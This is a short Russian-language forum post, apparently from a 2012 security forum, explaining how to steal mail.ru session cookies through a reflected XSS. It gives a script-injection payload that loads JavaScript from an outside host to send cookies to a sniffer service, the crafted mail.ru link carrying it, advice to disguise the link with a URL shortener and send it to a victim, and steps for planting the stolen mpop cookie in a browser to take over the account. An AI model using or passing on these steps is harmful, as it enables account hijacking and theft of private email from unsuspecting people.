Взлом мыла с помощью пассивной xss

01.02.2012, 15:22

tickhack

Guest

Сообщений: n/a

Провел на форуме:
2136

Репутация: -10

Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.

1.Нам понадобиться Пассивка

2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/

3.Мозги и руки !

Так заходим на сниффер и берём Код для пассивной XSS атаки вот он

Код:

Code:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"

мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так

Код:

Code:
http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"

Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.

Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/

заходим на этот сайт и где написано

Код:

Code:
Enter a long URL to make tiny:

вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку

Код:

Code:
make a TinyURL

И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.

Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.

Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.

ну чтож думаю всё !

не забываем про "+"

Автор : Tickhack

ANTICHAT — форум по информационной безопасности, OSINT и технологиям